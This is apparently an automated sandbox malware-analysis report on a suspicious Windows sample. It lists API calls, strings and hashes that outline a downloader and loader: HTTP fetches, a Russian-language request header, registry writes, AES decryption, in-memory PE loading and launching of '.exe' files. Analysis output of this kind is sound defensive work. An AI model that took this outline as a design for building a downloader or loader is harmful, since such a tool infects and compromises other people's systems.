                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                              • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                              • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                              • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            • __Init_thread_footer.LIBCMT ref: 00404202
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                            • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                            • API String ID: 995133137-4208347134
                                            • Opcode ID: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction ID: 2a7656185698f67e8fe61b04cbca63a222de47e8cf16a67dea48f36782a400ee
                                            • Opcode Fuzzy Hash: 2b5074e5ae3f74629323bde4956dacc6f2b5a6a8a3ea0f745ae83f81f010b08c
                                            • Instruction Fuzzy Hash: 7BF2D1B0E042188BDB24DF24CC49B9EBBB1EF45304F5441E9E5097B2D2DB78AA85CF59
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 004050BD
                                            • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                            • __Init_thread_footer.LIBCMT ref: 004053CB
                                            • Sleep.KERNEL32(000007D0), ref: 00405735
                                            • Sleep.KERNEL32(000007D0), ref: 0040574F
                                            • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                            • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                            • String ID: DFEK$SUB=$get$mixone$updateSW$U%
                                            • API String ID: 606935701-3680244588
                                            • Opcode ID: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction ID: 0d5b8b6ccd7ac2cce54ba59243f10dcebe2db4c82d63bd9967a8cdfa7b9099a4
                                            • Opcode Fuzzy Hash: 4db77f0429fbeff6bc7245b50d1839831cba9557f07ad327e6d61b565521e7f7
                                            • Instruction Fuzzy Hash: F5D20471D001148BDB14EB24CC597AEBB75AF01308F5481BEE8097B2D2DB78AE85CF99

                                            Control-flow Graph (starting at 402ec0)
                                            APIs
                                            • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                            • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                            Strings
                                            • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                            • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                            • DOS header size is not valid!, xrefs: 00402F51
                                            • p.@P.@0.@, xrefs: 004030C5
                                            • Section alignment invalid!, xrefs: 00402FA7
                                            • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                            • DOS header is not valid!, xrefs: 00402F12
                                            • Size is not valid!, xrefs: 00402EE8
                                            • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                            • API String ID: 1452528299-2075088523
                                            • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                            • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                            • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98

                                            Control-flow Graph (starting at 4035b0)
                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,92291A76), ref: 00403630
                                            • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                            • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                            • GetLastError.KERNEL32 ref: 004036C8
                                            • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                            • GetLastError.KERNEL32 ref: 004036FA
                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                            • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                            Strings
                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                            • API String ID: 3761881897-63410773
                                            • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                            • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                            • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55

                                            Control-flow Graph (starting at 402a20)
                                            APIs
                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                            • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                            • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                            • LocalFree.KERNEL32(00000000), ref: 00402B32
                                            • LocalFree.KERNEL32(?), ref: 00402B37
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                            • String ID: %s: %s$Error protecting memory page
                                            • API String ID: 839691724-1484484497
                                            • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                            • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                            • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98

                                            Control-flow Graph (starting at 401940)
                                            APIs
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                            • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$PointerRead
                                            • String ID: text
                                            • API String ID: 3197321146-999008199
                                            • Opcode ID: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                            • Opcode Fuzzy Hash: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                            • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99

                                            Control-flow Graph

                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F4D126
                                            • Module32First.KERNEL32(00000000,00000224), ref: 00F4D146
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2665403133.0000000000F4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f4c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: e507d7dfc0e0313ec1f929d85312605204cb9a0ea4d7a58d211414fa93b667f8
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 69F096315007146BF7203BF59C8DBAE7AECAF89734F100629FE52911C0DB74EC459A61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: emp$mixtwo
                                            • API String ID: 3472027048-2390925073
                                            • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                            • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                            • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6

                                            Control-flow Graph

                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                            • __cftof.LIBCMT ref: 10001624
                                            • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                            • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                            • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                            • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                            • String ID: GET$http://
                                            • API String ID: 1233269984-1632879366
                                            • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                            • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                            • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                            Control-flow Graph

                                            APIs
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                              • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                            • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                            Strings
                                            • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                            • GET, xrefs: 004020B7
                                            • text, xrefs: 00401B5F
                                            • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                            • http://, xrefs: 00401EC4, 004021A3
                                            • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                            • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                            • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                            • API String ID: 2146599340-4172842843
                                            • Opcode ID: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                            • Instruction ID: d9449a1bc553b4f7263359658e85a8d5597bae1f9675cad689ed873ec2693fe7
                                            • Opcode Fuzzy Hash: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                            • Instruction Fuzzy Hash: A4316371D00109AFEB14DBE9CC85FEEB7B9EB08714F60812AE521731C0C7789945CBA4

                                            Control-flow Graph

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04D1024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: 154a8ab1909e446166ca7e8a6bb3bf11d41d03e6729698bca36e6e6beee54fa4
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 2F528974A00229DFDB65DF58D984BACBBB1BF09304F1480D9E94DAB761DB30AA84DF14

                                            Control-flow Graph

                                            APIs
                                            • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                            • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                            • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                            • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                            • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                            • String ID: text
                                            • API String ID: 1154000607-999008199
                                            • Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                            • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                            • Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                            • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                            APIs
                                              • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,92291A76), ref: 004107F7
                                              • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: SUB=$get$U%
                                            • API String ID: 2563648476-1840017472
                                            • Opcode ID: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                            • Instruction ID: c38411781881cdafda6c84006562c20812e5f10be50bcbbeaff71a156a434d29
                                            • Opcode Fuzzy Hash: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                            • Instruction Fuzzy Hash: 04323171D101089BCB19FBB5C95AADE73786F14308F50817FE856771C2EE7C6A08CAA9

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                              • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: .exe$open
                                            • API String ID: 1627157292-49952409
                                            • Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                            • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                            • Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                            • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: http://
                                            • API String ID: 0-1121587658
                                            • Opcode ID: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                            • Instruction ID: 09126ff878240097ddd60f0c8300d9112e53121ff3c2cf1df5c9ef382bee38eb
                                            • Opcode Fuzzy Hash: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                            • Instruction Fuzzy Hash: 1A518E71E002099FDF14CFA9C895BEEB7B9EB08304F10812EE915BB6C1C779A944CB94

                                            Control-flow Graph

                                            APIs
                                            • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                            • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleWrite
                                            • String ID:
                                            • API String ID: 1065093856-0
                                            • Opcode ID: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                            • Instruction ID: 5700bef43f604e24781938fdb315806f7bd82b17c931dadbe0ad0f8cbe635642
                                            • Opcode Fuzzy Hash: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                            • Instruction Fuzzy Hash: 2B01D272600208ABDB20DBA8DD49FAEB7E8EB48714F40417EFA05A62D0CBB46945C758

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,92291A76,0040CDA2,08758BC2), ref: 00410547
                                            • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,92291A76,0040CDA2,08758BC2), ref: 0041054E
                                            • ExitProcess.KERNEL32 ref: 00410560
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Process$CurrentExitTerminate
                                            • String ID:
                                            • API String ID: 1703294689-0
                                            • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                            • Instruction ID: 67797f44d9d46dd495823d9566bad27c4dc507fd550e6630b3786a266b8fea83
                                            • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                            • Instruction Fuzzy Hash: A0D09E31000108FBCF11AF61DC0D8CD3F26AF40355B008035BD0945131DFB59DD69E48

                                            Control-flow Graph

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                            • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 485612231-0
                                            • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                            • Instruction ID: d8d9c1c0f29fd1ae3c391d4f931883298020c9469a54bb124b4f82b2896bf902
                                            • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                            • Instruction Fuzzy Hash: E6E0E6356002146BCB113FB5AC097D57F68AB44759F114076F60C96161D6398996879C

                                            Control-flow Graph

                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,04D10223,?,?), ref: 04D10E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,04D10223,?,?), ref: 04D10E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: fa990c87b63ba4385ae1a8ea0be8238145ff818bc65649bef568f2eb2db3f7b6
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: BAD0123114512877DB013A95DC09BCD7B1CDF05B62F008011FB0DD9480C770954046E5
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction ID: d9d624181c4160d02ab49c773ca7be82655902724fa9057d6622eb650e71da69
                                            • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                                            • Instruction Fuzzy Hash: BAE0E53350013057D6213F668C007DB7A4C9F413A2F180167EC18B62D0FA6CCE8141ED
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmp
